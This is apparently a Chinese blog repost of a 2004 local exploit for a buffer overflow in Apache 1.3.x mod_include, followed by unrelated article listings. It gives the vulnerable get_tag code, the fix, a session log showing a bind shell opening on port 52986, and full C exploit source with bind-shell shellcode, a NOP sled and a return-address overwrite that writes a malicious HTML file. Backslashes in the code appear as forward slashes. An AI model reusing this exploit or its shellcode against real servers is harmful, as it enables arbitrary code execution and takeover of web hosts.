Apache mod_include_exp

原创 2004年10月25日 21:09:00
/*********************************************************************************
local exploit for mod_include of apache 1.3.x                                   *
written by xCrZx                         /18.10.2004/                           *
bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
y0das old shao lin techniq ownz u :) remember my words                          *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/

/*********************************************************************************
Technical Details:                                                              *
                                                                                 *
there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '/0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept /" as a valid character within a string. //                    *
        if (c == '//') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if //                                    *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '/0';                                                                   *
...                                                                              *
                                                                                 *
as we can see there is a [1] check to determine the end of tag buffer            *
but this check can be skiped when [2] & [4] conditions will be occured           *
at the same time without [3] condition.                                          *
                                                                                 *
So attacker can create malicious file to overflow static buffer, on              *
which tag points out and execute arbitrary code with privilegies of              *
httpd child process.                                                             *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf        *
                                                                                 *
*********************************************************************************/

/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/

/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
*********************************************************************************/

/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/

/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define EVILBUF 8202
#define HTMLTEXT 1000

#define HTML_FORMAT "<html>/n<!--#echo done=/"%s/" -->/nxCrZx 0wn U/n</html>"

#define AUTHOR "/n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***/n"

int main(int argc, char **argv) {

    char html[EVILBUF+HTMLTEXT];
    char evilbuf[EVILBUF+1];

    //can be changed
    char shellcode[] =

    // bind shell on 52986 port
    "/x31/xc0"
    "/x31/xdb/x53/x43/x53/x89/xd8/x40/x50/x89/xe1/xb0/x66/xcd/x80/x43"
    "/x66/xc7/x44/x24/x02/xce/xfa/xd1/x6c/x24/x04/x6a/x10/x51/x50/x89"
    "/xe1/xb0/x66/xcd/x80/x43/x43/xb0/x66/xcd/x80/x43/x89/x61/x08/xb0"
    "/x66/xcd/x80/x93/x31/xc9/xb1/x03/x49/xb0/x3f/xcd/x80/x75/xf9/x68"
    "/x2f/x73/x68/x20/x68/x2f/x62/x69/x6e/x88/x4c/x24/x07/x89/xe3/x51"
    "/x53/x89/xe1/x31/xd2/xb0/x0b/xcd/x80";

    //execve /tmp/sh <- your own program
   /*
    "/x31/xc0/x31/xdb/xb0/x17/xcd/x80"
    "/xb0/x2e/xcd/x80/xeb/x15/x5b/x31"
    "/xc0/x88/x43/x07/x89/x5b/x08/x89"
    "/x43/x0c/x8d/x4b/x08/x31/xd2/xb0"
    "/x0b/xcd/x80/xe8/xe6/xff/xff/xff"
    "/tmp/sh";
   */


    char NOP[] = "/x90/x40";             // special nops ;)
    char evilpad[] = "//CRZCRZCRZCRZC";  // trick ;)

    int padding,xpad=0;
    int i,fd;
    long ret=0xbfff8688;

    if(argc>1) ret=strtoul(argv[1],0,16);
    else { fprintf(stderr,AUTHOR"/nUsage: %s <RET ADDR> > file.html/n/n",argv[0]);exit(0); }

    padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);

    while(1) {
        if(padding%2==0) { padding/=2; break;}
        else {padding--;xpad++;}
    }

    memset(html,0x0,sizeof html);
    memset(evilbuf,0x0,sizeof evilbuf);

    for(i=0;i<padding;i++)
        memcpy(evilbuf+strlen(evilbuf),&NOP,2);
    for(i=0;i<xpad;i++)
        memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

    memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
    memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
    *(long*)&evilbuf[strlen(evilbuf)]=ret;

    sprintf(html,HTML_FORMAT,evilbuf);

    printf("%s",html);

    return 0;
}

HTTP/Apache 错误代码汇总

http 状态码基本上可以分为 5 类: 1xx 为消息类,该类状态代码用于表示服务器临时回应。 100 Continue 表示初始的请求已经被服务器接受,浏览器应当继续发送请求的...
  • php_younger
  • php_younger
  • 2016年10月11日 15:47
  • 832

Apache的在线升级

升级Apache到最新版本,本来并不复杂,但是因为涉及到不能停止现有的Apache实例的运行,因此要小心翼翼的做。 大致分成三步: 编译新的Apache, 配置新的Apache, ...
  • qq_36345367
  • qq_36345367
  • 2017年05月27日 17:11
  • 433

服务器架设笔记——Apache模块开发基础知识

本文简略介绍了Apache插件所涉及的基础知识。
  • breaksoftware
  • breaksoftware
  • 2015年02月18日 19:33
  • 3823

apache 页面缓存机制,图片 缓存 (mod_expires)

#LoadModule expires_module modules/mod_expires.so (去掉#号) 我把配置信息写到 .htaccess文件中 ExpiresActive...
  • u013791858
  • u013791858
  • 2015年12月11日 10:16
  • 1238

Apache组织一级开源项目清单

1.      HTTP Server: HTTP Server是目前最流行的HTTP服务器软件之一。其优势主要在于快速、可靠、可通过简单的API扩展,Perl/Python解释器可被编译到服务器中...
  • lky5387
  • lky5387
  • 2014年06月26日 13:10
  • 4804

Apache中的配置指令概述

 //本文是《Apache源代码全景分析》第二卷《体系结构和核心模块》中的第八章《配置文件管理》的草稿部分中,主要描述Apache中的指令概念,在后续的章节中我们将继续深入Apache中的配置文件的处...
  • tingya
  • tingya
  • 2006年09月25日 23:03
  • 13883

修改apache默认字符编码--在页面中显示乱码

apache打开网页乱码,修改apache默认字符集的方法如下: 打开apache配置文件httpd.conf,Windows下的apache配置文件路径一般为D:\Program Files\Ap...
  • tanzugan
  • tanzugan
  • 2012年01月04日 11:15
  • 13210

Linux下启动和停止apache服务

文章作者:Tyan 博客:noahsnail.com  |  CSDN  |  简书 本文使用的Linux系统为CentOS 7,下面将介绍apache服务的启动、关闭与设置。apache在Cen...
  • Quincuntial
  • Quincuntial
  • 2017年05月27日 18:28
  • 3570

apache参数详解

apache参数详解 Linux Apache Web 服务器终极教程作者:佚名 文章来源:internet                           Apache的主要特征是:  .  可...
  • lxholding
  • lxholding
  • 2007年09月26日 13:08
  • 1476

apache如何解决跨域资源访问

很多时候,大中型网站为了静态资源分布式部署,加快访问速度,减轻主站压力,会把静态资源(例如字体文件、图片等)放在独立服务器或者CDN上,并且使用独立的资源域名(例如res.test.com) 但是在实...
  • ownfire
  • ownfire
  • 2015年07月01日 10:40
  • 26917
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Apache mod_include_exp
举报原因:
原因补充:

(最多只允许输入30个字)